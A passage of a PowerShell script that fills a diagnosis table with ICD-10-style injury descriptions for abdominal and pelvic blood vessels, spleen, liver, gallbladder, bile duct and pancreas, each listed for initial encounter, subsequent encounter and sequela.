$DiagnosisList.Rows.Add("Unspecified injury of superior mesenteric vein","Unspecified injury of superior mesenteric vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of superior mesenteric vein","Unspecified injury of superior mesenteric vein, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of inferior mesenteric vein","Laceration of inferior mesenteric vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of inferior mesenteric vein","Laceration of inferior mesenteric vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of inferior mesenteric vein","Laceration of inferior mesenteric vein, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of inferior mesenteric vein","Other specified injury of inferior mesenteric vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of inferior mesenteric vein","Other specified injury of inferior mesenteric vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of inferior mesenteric vein","Other specified injury of inferior mesenteric vein, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of inferior mesenteric vein","Unspecified injury of inferior mesenteric vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of inferior mesenteric vein","Unspecified injury of inferior mesenteric vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of inferior mesenteric vein","Unspecified injury of inferior mesenteric vein, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right renal artery","Unspecified injury of right renal artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right renal artery","Unspecified injury of right renal artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right renal artery","Unspecified injury of right renal artery, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left renal artery","Unspecified injury of left renal artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left renal artery","Unspecified injury of left renal artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left renal artery","Unspecified injury of left renal artery, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified renal artery","Unspecified injury of unspecified renal artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified renal artery","Unspecified injury of unspecified renal artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified renal artery","Unspecified injury of unspecified renal artery, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right renal vein","Unspecified injury of right renal vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right renal vein","Unspecified injury of right renal vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right renal vein","Unspecified injury of right renal vein, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left renal vein","Unspecified injury of left renal vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left renal vein","Unspecified injury of left renal vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left renal vein","Unspecified injury of left renal vein, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified renal vein","Unspecified injury of unspecified renal vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified renal vein","Unspecified injury of unspecified renal vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified renal vein","Unspecified injury of unspecified renal vein, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of right renal artery","Laceration of right renal artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of right renal artery","Laceration of right renal artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of right renal artery","Laceration of right renal artery, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of left renal artery","Laceration of left renal artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of left renal artery","Laceration of left renal artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of left renal artery","Laceration of left renal artery, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified renal artery","Laceration of unspecified renal artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified renal artery","Laceration of unspecified renal artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified renal artery","Laceration of unspecified renal artery, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of right renal vein","Laceration of right renal vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of right renal vein","Laceration of right renal vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of right renal vein","Laceration of right renal vein, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of left renal vein","Laceration of left renal vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of left renal vein","Laceration of left renal vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of left renal vein","Laceration of left renal vein, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified renal vein","Laceration of unspecified renal vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified renal vein","Laceration of unspecified renal vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified renal vein","Laceration of unspecified renal vein, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of right renal artery","Other specified injury of right renal artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of right renal artery","Other specified injury of right renal artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of right renal artery","Other specified injury of right renal artery, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of left renal artery","Other specified injury of left renal artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of left renal artery","Other specified injury of left renal artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of left renal artery","Other specified injury of left renal artery, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified renal artery","Other specified injury of unspecified renal artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified renal artery","Other specified injury of unspecified renal artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified renal artery","Other specified injury of unspecified renal artery, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of right renal vein","Other specified injury of right renal vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of right renal vein","Other specified injury of right renal vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of right renal vein","Other specified injury of right renal vein, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of left renal vein","Other specified injury of left renal vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of left renal vein","Other specified injury of left renal vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of left renal vein","Other specified injury of left renal vein, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified renal vein","Other specified injury of unspecified renal vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified renal vein","Other specified injury of unspecified renal vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified renal vein","Other specified injury of unspecified renal vein, sequela") + $null = $DiagnosisList.Rows.Add("Injury of unspecified iliac blood vessel(s)","Injury of unspecified iliac blood vessel(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified iliac blood vessel(s)","Injury of unspecified iliac blood vessel(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified iliac blood vessel(s)","Injury of unspecified iliac blood vessel(s), sequela") + $null = $DiagnosisList.Rows.Add("Injury of right iliac artery","Injury of right iliac artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of right iliac artery","Injury of right iliac artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of right iliac artery","Injury of right iliac artery, sequela") + $null = $DiagnosisList.Rows.Add("Injury of left iliac artery","Injury of left iliac artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of left iliac artery","Injury of left iliac artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of left iliac artery","Injury of left iliac artery, sequela") + $null = $DiagnosisList.Rows.Add("Injury of unspecified iliac artery","Injury of unspecified iliac artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified iliac artery","Injury of unspecified iliac artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified iliac artery","Injury of unspecified iliac artery, sequela") + $null = $DiagnosisList.Rows.Add("Injury of right iliac vein","Injury of right iliac vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of right iliac vein","Injury of right iliac vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of right iliac vein","Injury of right iliac vein, sequela") + $null = $DiagnosisList.Rows.Add("Injury of left iliac vein","Injury of left iliac vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of left iliac vein","Injury of left iliac vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of left iliac vein","Injury of left iliac vein, sequela") + $null = $DiagnosisList.Rows.Add("Injury of unspecified iliac vein","Injury of unspecified iliac vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified iliac vein","Injury of unspecified iliac vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified iliac vein","Injury of unspecified iliac vein, sequela") + $null = $DiagnosisList.Rows.Add("Injury of right uterine artery","Injury of right uterine artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of right uterine artery","Injury of right uterine artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of right uterine artery","Injury of right uterine artery, sequela") + $null = $DiagnosisList.Rows.Add("Injury of left uterine artery","Injury of left uterine artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of left uterine artery","Injury of left uterine artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of left uterine artery","Injury of left uterine artery, sequela") + $null = $DiagnosisList.Rows.Add("Injury of unspecified uterine artery","Injury of unspecified uterine artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified uterine artery","Injury of unspecified uterine artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified uterine artery","Injury of unspecified uterine artery, sequela") + $null = $DiagnosisList.Rows.Add("Injury of right uterine vein","Injury of right uterine vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of right uterine vein","Injury of right uterine vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of right uterine vein","Injury of right uterine vein, sequela") + $null = $DiagnosisList.Rows.Add("Injury of left uterine vein","Injury of left uterine vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of left uterine vein","Injury of left uterine vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of left uterine vein","Injury of left uterine vein, sequela") + $null = $DiagnosisList.Rows.Add("Injury of unspecified uterine vein","Injury of unspecified uterine vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified uterine vein","Injury of unspecified uterine vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified uterine vein","Injury of unspecified uterine vein, sequela") + $null = $DiagnosisList.Rows.Add("Injury of other iliac blood vessels","Injury of other iliac blood vessels, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of other iliac blood vessels","Injury of other iliac blood vessels, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of other iliac blood vessels","Injury of other iliac blood vessels, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at abdomen, lower back and pelvis level","Laceration of other blood vessels at abdomen, lower back and pelvis level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at abdomen, lower back and pelvis level","Laceration of other blood vessels at abdomen, lower back and pelvis level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at abdomen, lower back and pelvis level","Laceration of other blood vessels at abdomen, lower back and pelvis level, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at abdomen, lower back and pelvis level","Other specified injury of other blood vessels at abdomen, lower back and pelvis level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at abdomen, lower back and pelvis level","Other specified injury of other blood vessels at abdomen, lower back and pelvis level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at abdomen, lower back and pelvis level","Other specified injury of other blood vessels at abdomen, lower back and pelvis level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at abdomen, lower back and pelvis level","Unspecified injury of other blood vessels at abdomen, lower back and pelvis level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at abdomen, lower back and pelvis level","Unspecified injury of other blood vessels at abdomen, lower back and pelvis level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at abdomen, lower back and pelvis level","Unspecified injury of other blood vessels at abdomen, lower back and pelvis level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at abdomen, lower back and pelvis level","Unspecified injury of unspecified blood vessel at abdomen, lower back and pelvis level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at abdomen, lower back and pelvis level","Unspecified injury of unspecified blood vessel at abdomen, lower back and pelvis level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at abdomen, lower back and pelvis level","Unspecified injury of unspecified blood vessel at abdomen, lower back and pelvis level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at abdomen, lower back and pelvis level","Laceration of unspecified blood vessel at abdomen, lower back and pelvis level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at abdomen, lower back and pelvis level","Laceration of unspecified blood vessel at abdomen, lower back and pelvis level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at abdomen, lower back and pelvis level","Laceration of unspecified blood vessel at abdomen, lower back and pelvis level, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at abdomen, lower back and pelvis level","Other specified injury of unspecified blood vessel at abdomen, lower back and pelvis level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at abdomen, lower back and pelvis level","Other specified injury of unspecified blood vessel at abdomen, lower back and pelvis level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at abdomen, lower back and pelvis level","Other specified injury of unspecified blood vessel at abdomen, lower back and pelvis level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of spleen","Unspecified injury of spleen, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of spleen","Unspecified injury of spleen, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of spleen","Unspecified injury of spleen, sequela") + $null = $DiagnosisList.Rows.Add("Minor contusion of spleen","Minor contusion of spleen, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor contusion of spleen","Minor contusion of spleen, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor contusion of spleen","Minor contusion of spleen, sequela") + $null = $DiagnosisList.Rows.Add("Major contusion of spleen","Major contusion of spleen, initial encounter") + $null = $DiagnosisList.Rows.Add("Major contusion of spleen","Major contusion of spleen, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major contusion of spleen","Major contusion of spleen, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified contusion of spleen","Unspecified contusion of spleen, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified contusion of spleen","Unspecified contusion of spleen, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified contusion of spleen","Unspecified contusion of spleen, sequela") + $null = $DiagnosisList.Rows.Add("Superficial (capsular) laceration of spleen","Superficial (capsular) laceration of spleen, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial (capsular) laceration of spleen","Superficial (capsular) laceration of spleen, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial (capsular) laceration of spleen","Superficial (capsular) laceration of spleen, sequela") + $null = $DiagnosisList.Rows.Add("Moderate laceration of spleen","Moderate laceration of spleen, initial encounter") + $null = $DiagnosisList.Rows.Add("Moderate laceration of spleen","Moderate laceration of spleen, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Moderate laceration of spleen","Moderate laceration of spleen, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of spleen","Major laceration of spleen, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of spleen","Major laceration of spleen, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of spleen","Major laceration of spleen, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified laceration of spleen","Unspecified laceration of spleen, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified laceration of spleen","Unspecified laceration of spleen, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified laceration of spleen","Unspecified laceration of spleen, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of spleen","Other injury of spleen, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of spleen","Other injury of spleen, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of spleen","Other injury of spleen, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of liver","Contusion of liver, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of liver","Contusion of liver, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of liver","Contusion of liver, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of liver, unspecified degree","Laceration of liver, unspecified degree, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of liver, unspecified degree","Laceration of liver, unspecified degree, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of liver, unspecified degree","Laceration of liver, unspecified degree, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of liver","Minor laceration of liver, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of liver","Minor laceration of liver, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of liver","Minor laceration of liver, sequela") + $null = $DiagnosisList.Rows.Add("Moderate laceration of liver","Moderate laceration of liver, initial encounter") + $null = $DiagnosisList.Rows.Add("Moderate laceration of liver","Moderate laceration of liver, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Moderate laceration of liver","Moderate laceration of liver, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of liver","Major laceration of liver, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of liver","Major laceration of liver, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of liver","Major laceration of liver, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of liver","Other injury of liver, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of liver","Other injury of liver, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of liver","Other injury of liver, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of liver","Unspecified injury of liver, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of liver","Unspecified injury of liver, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of liver","Unspecified injury of liver, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of gallbladder","Contusion of gallbladder, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of gallbladder","Contusion of gallbladder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of gallbladder","Contusion of gallbladder, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of gallbladder","Laceration of gallbladder, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of gallbladder","Laceration of gallbladder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of gallbladder","Laceration of gallbladder, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of gallbladder","Other injury of gallbladder, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of gallbladder","Other injury of gallbladder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of gallbladder","Other injury of gallbladder, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of gallbladder","Unspecified injury of gallbladder, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of gallbladder","Unspecified injury of gallbladder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of gallbladder","Unspecified injury of gallbladder, sequela") + $null = $DiagnosisList.Rows.Add("Injury of bile duct","Injury of bile duct, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of bile duct","Injury of bile duct, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of bile duct","Injury of bile duct, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of head of pancreas","Unspecified injury of head of pancreas, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of head of pancreas","Unspecified injury of head of pancreas, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of head of pancreas","Unspecified injury of head of pancreas, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of body of pancreas","Unspecified injury of body of pancreas, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of body of pancreas","Unspecified injury of body of pancreas, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of body of pancreas","Unspecified injury of body of pancreas, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of tail of pancreas","Unspecified injury of tail of pancreas, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of tail of pancreas","Unspecified injury of tail of pancreas, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of tail of pancreas","Unspecified injury of tail of pancreas, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified part of pancreas","Unspecified injury of unspecified part of pancreas, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified part of pancreas","Unspecified injury of unspecified part of pancreas, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified part of pancreas","Unspecified injury of unspecified part of pancreas, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of head of pancreas","Contusion of head of pancreas, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of head of pancreas","Contusion of head of pancreas, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of head of pancreas","Contusion of head of pancreas, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of body of pancreas","Contusion of body of pancreas, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of body of pancreas","Contusion of body of pancreas, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of body of pancreas","Contusion of body of pancreas, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of tail of pancreas","Contusion of tail of pancreas, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of tail of pancreas","Contusion of tail of pancreas, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of tail of pancreas","Contusion of tail of pancreas, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified part of pancreas","Contusion of unspecified part of pancreas, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified part of pancreas","Contusion of unspecified part of pancreas, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified part of pancreas","Contusion of unspecified part of pancreas, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of head of pancreas, unspecified degree","Laceration of head of pancreas, unspecified degree, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of head of pancreas, unspecified degree","Laceration of head of pancreas, unspecified degree, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of head of pancreas, unspecified degree","Laceration of head of pancreas, unspecified degree, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of body of pancreas, unspecified degree","Laceration of body of pancreas, unspecified degree, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of body of pancreas, unspecified degree","Laceration of body of pancreas, unspecified degree, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of body of pancreas, unspecified degree","Laceration of body of pancreas, unspecified degree, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of tail of pancreas, unspecified degree","Laceration of tail of pancreas, unspecified degree, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of tail of pancreas, unspecified degree","Laceration of tail of pancreas, unspecified degree, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of tail of pancreas, unspecified degree","Laceration of tail of pancreas, unspecified degree, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified part of pancreas, unspecified degree","Laceration of unspecified part of pancreas, unspecified degree, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified part of pancreas, unspecified degree","Laceration of unspecified part of pancreas, unspecified degree, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified part of pancreas, unspecified degree","Laceration of unspecified part of pancreas, unspecified degree, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of head of pancreas","Minor laceration of head of pancreas, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of head of pancreas","Minor laceration of head of pancreas, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of head of pancreas","Minor laceration of head of pancreas, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of body of pancreas","Minor laceration of body of pancreas, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of body of pancreas","Minor laceration of body of pancreas, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of body of pancreas","Minor laceration of body of pancreas, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of tail of pancreas","Minor laceration of tail of pancreas, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of tail of pancreas","Minor laceration of tail of pancreas, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of tail of pancreas","Minor laceration of tail of pancreas, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of unspecified part of pancreas","Minor laceration of unspecified part of pancreas, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of unspecified part of pancreas","Minor laceration of unspecified part of pancreas, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of unspecified part of pancreas","Minor laceration of unspecified part of pancreas, sequela") + $null = $DiagnosisList.Rows.Add("Moderate laceration of head of pancreas","Moderate laceration of head of pancreas, initial encounter") + $null = $DiagnosisList.Rows.Add("Moderate laceration of head of pancreas","Moderate laceration of head of pancreas, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Moderate laceration of head of pancreas","Moderate laceration of head of pancreas, sequela") + $null = $DiagnosisList.Rows.Add("Moderate laceration of body of pancreas","Moderate laceration of body of pancreas, initial encounter") + $null = $DiagnosisList.Rows.Add("Moderate laceration of body of pancreas","Moderate laceration of body of pancreas, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Moderate laceration of body of pancreas","Moderate laceration of body of pancreas, sequela") + $null = $DiagnosisList.Rows.Add("Moderate laceration of tail of pancreas","Moderate laceration of tail of pancreas, initial encounter") + $null = $DiagnosisList.Rows.Add("Moderate laceration of tail of pancreas","Moderate laceration of tail of pancreas, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Moderate laceration of tail of pancreas","Moderate laceration of tail of pancreas, sequela") + $null = $DiagnosisList.Rows.Add("Moderate laceration of unspecified part of pancreas","Moderate laceration of unspecified part of pancreas, initial encounter") + $null = $DiagnosisList.Rows.Add("Moderate laceration of unspecified part of pancreas","Moderate laceration of unspecified part of pancreas, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Moderate laceration of unspecified part of pancreas","Moderate laceration of unspecified part of pancreas, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of head of pancreas","Major laceration of head of pancreas, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of head of pancreas","Major laceration of head of pancreas, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of head of pancreas","Major laceration of head of pancreas, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of body of pancreas","Major laceration of body of pancreas, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of body of pancreas","Major laceration of body of pancreas, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of body of pancreas","Major laceration of body of pancreas, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of tail of pancreas","Major laceration of tail of pancreas, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of tail of pancreas","Major laceration of tail of pancreas, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of tail of pancreas","Major laceration of tail of pancreas, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of unspecified part of pancreas","Major laceration of unspecified part of pancreas, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of unspecified part of pancreas","Major laceration of unspecified part of pancreas, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of unspecified part of pancreas","Major laceration of unspecified part of pancreas, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of head of pancreas","Other injury of head of pancreas, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of head of pancreas","Other injury of head of pancreas, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of head of pancreas","Other injury of head of pancreas, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of body of pancreas","Other injury of body of pancreas, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of body of pancreas","Other injury of body of pancreas, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of body of pancreas","Other injury of body of pancreas, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of tail of pancreas","Other injury of tail of pancreas, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of tail of pancreas","Other injury of tail of pancreas, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of tail of pancreas","Other injury of tail of pancreas, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified part of pancreas","Other injury of unspecified part of pancreas, initial encounter") + $null = 